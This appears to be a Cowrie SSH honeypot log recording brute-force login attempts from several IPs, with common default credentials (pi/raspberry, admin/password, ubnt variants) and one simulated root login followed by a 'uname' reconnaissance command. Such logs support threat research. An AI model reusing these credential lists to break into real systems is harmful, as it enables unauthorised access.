{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:54:43.102997Z","src_ip":"212.227.235.229","session":"0f2655846157"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34784,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd1601c317c4","protocol":"ssh","message":"New connection: 194.233.79.134:34784 (1.2.3.4:22) [session: dd1601c317c4]","sensor":"my-vps","timestamp":"2025-08-28T02:55:52.019575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:55:52.621252Z","src_ip":"194.233.79.134","session":"dd1601c317c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:55:52.622184Z","src_ip":"194.233.79.134","session":"dd1601c317c4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T02:55:57.875921Z","src_ip":"194.233.79.134","session":"dd1601c317c4"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:55:59.666847Z","src_ip":"194.233.79.134","session":"dd1601c317c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56550,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e71d2ee6df8","protocol":"ssh","message":"New connection: 212.227.235.229:56550 (1.2.3.4:22) [session: 6e71d2ee6df8]","sensor":"my-vps","timestamp":"2025-08-28T02:56:27.295293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:56:27.296118Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:56:27.428277Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.login.failed","username":"minh","password":"minh","message":"login attempt [minh/minh] failed","sensor":"my-vps","timestamp":"2025-08-28T02:56:28.024822Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abc123","message":"login attempt [minh/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:56:29.153141Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abcd123","message":"login attempt [minh/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:56:30.284034Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abcd1234","message":"login attempt [minh/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:56:31.412773Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abc1234","message":"login attempt [minh/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:56:32.541815Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:56:33.670295Z","src_ip":"212.227.235.229","session":"6e71d2ee6df8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29235,"dst_ip":"1.2.3.4","dst_port":22,"session":"beeaff3bb4b7","protocol":"ssh","message":"New connection: 212.227.125.160:29235 (1.2.3.4:22) [session: beeaff3bb4b7]","sensor":"my-vps","timestamp":"2025-08-28T02:57:01.552573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:57:01.553514Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:57:01.634932Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"jM8vF4aZ9uQ1sZ5","message":"login attempt [ubnt/jM8vF4aZ9uQ1sZ5] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:02.044278Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"test","message":"login attempt [ubnt/test] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:03.127411Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"Qwerty12","message":"login attempt [ubnt/Qwerty12] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:04.210715Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"uM6kS5wE0mH4kD8","message":"login attempt [ubnt/uM6kS5wE0mH4kD8] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:05.294814Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62780,"dst_ip":"1.2.3.4","dst_port":22,"session":"adc993a78868","protocol":"ssh","message":"New connection: 212.227.125.160:62780 (1.2.3.4:22) [session: adc993a78868]","sensor":"my-vps","timestamp":"2025-08-28T02:57:05.581139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:57:05.581769Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:57:05.668287Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis","message":"login attempt [francis/francis] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:06.133582Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"qwerty123456","message":"login attempt [ubnt/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:06.380135Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis1","message":"login attempt [francis/francis1] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:07.248199Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:57:07.461798Z","src_ip":"212.227.125.160","session":"beeaff3bb4b7"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis123","message":"login attempt [francis/francis123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:08.362363Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis1234","message":"login attempt [francis/francis1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:09.475856Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.login.failed","username":"francis","password":"francis12345","message":"login attempt [francis/francis12345] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:10.584467Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:57:11.688450Z","src_ip":"212.227.125.160","session":"adc993a78868"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16736,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94a6bb691df","protocol":"ssh","message":"New connection: 45.125.211.194:16736 (1.2.3.4:22) [session: f94a6bb691df]","sensor":"my-vps","timestamp":"2025-08-28T02:57:31.867144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:57:31.874144Z","src_ip":"45.125.211.194","session":"f94a6bb691df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:57:32.075480Z","src_ip":"45.125.211.194","session":"f94a6bb691df"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:57:32.913368Z","src_ip":"45.125.211.194","session":"f94a6bb691df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:57:33.346536Z","src_ip":"45.125.211.194","session":"f94a6bb691df"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:57:33.347223Z","src_ip":"45.125.211.194","session":"f94a6bb691df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:57:33.569166Z","src_ip":"45.125.211.194","session":"f94a6bb691df"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:57:33.570231Z","src_ip":"45.125.211.194","session":"f94a6bb691df"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":49882,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3fea8c2b3e9","protocol":"ssh","message":"New connection: 194.233.79.134:49882 (1.2.3.4:22) [session: f3fea8c2b3e9]","sensor":"my-vps","timestamp":"2025-08-28T02:57:33.700795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:57:34.430493Z","src_ip":"194.233.79.134","session":"f3fea8c2b3e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:57:34.431471Z","src_ip":"194.233.79.134","session":"f3fea8c2b3e9"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:36.965469Z","src_ip":"194.233.79.134","session":"f3fea8c2b3e9"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:57:38.433509Z","src_ip":"194.233.79.134","session":"f3fea8c2b3e9"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":59059,"dst_ip":"1.2.3.4","dst_port":22,"session":"87f9ffab3cbc","protocol":"ssh","message":"New connection: 45.125.211.194:59059 (1.2.3.4:22) [session: 87f9ffab3cbc]","sensor":"my-vps","timestamp":"2025-08-28T02:57:45.999032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:57:46.041975Z","src_ip":"45.125.211.194","session":"87f9ffab3cbc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:57:46.215803Z","src_ip":"45.125.211.194","session":"87f9ffab3cbc"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T02:57:47.079259Z","src_ip":"45.125.211.194","session":"87f9ffab3cbc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:57:48.291650Z","src_ip":"45.125.211.194","session":"87f9ffab3cbc"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":64709,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca3288fd8a1e","protocol":"ssh","message":"New connection: 45.125.211.194:64709 (1.2.3.4:22) [session: ca3288fd8a1e]","sensor":"my-vps","timestamp":"2025-08-28T02:58:01.717965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:58:01.734155Z","src_ip":"45.125.211.194","session":"ca3288fd8a1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:58:01.954436Z","src_ip":"45.125.211.194","session":"ca3288fd8a1e"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-28T02:58:02.769717Z","src_ip":"45.125.211.194","session":"ca3288fd8a1e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:58:03.982371Z","src_ip":"45.125.211.194","session":"ca3288fd8a1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62213,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f41f1d8b887","protocol":"ssh","message":"New connection: 212.227.125.160:62213 (1.2.3.4:22) [session: 7f41f1d8b887]","sensor":"my-vps","timestamp":"2025-08-28T02:58:04.663717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:58:04.665578Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:58:04.778471Z","src_ip":"212.227.125.160","session":"7f41f1d8b887"}
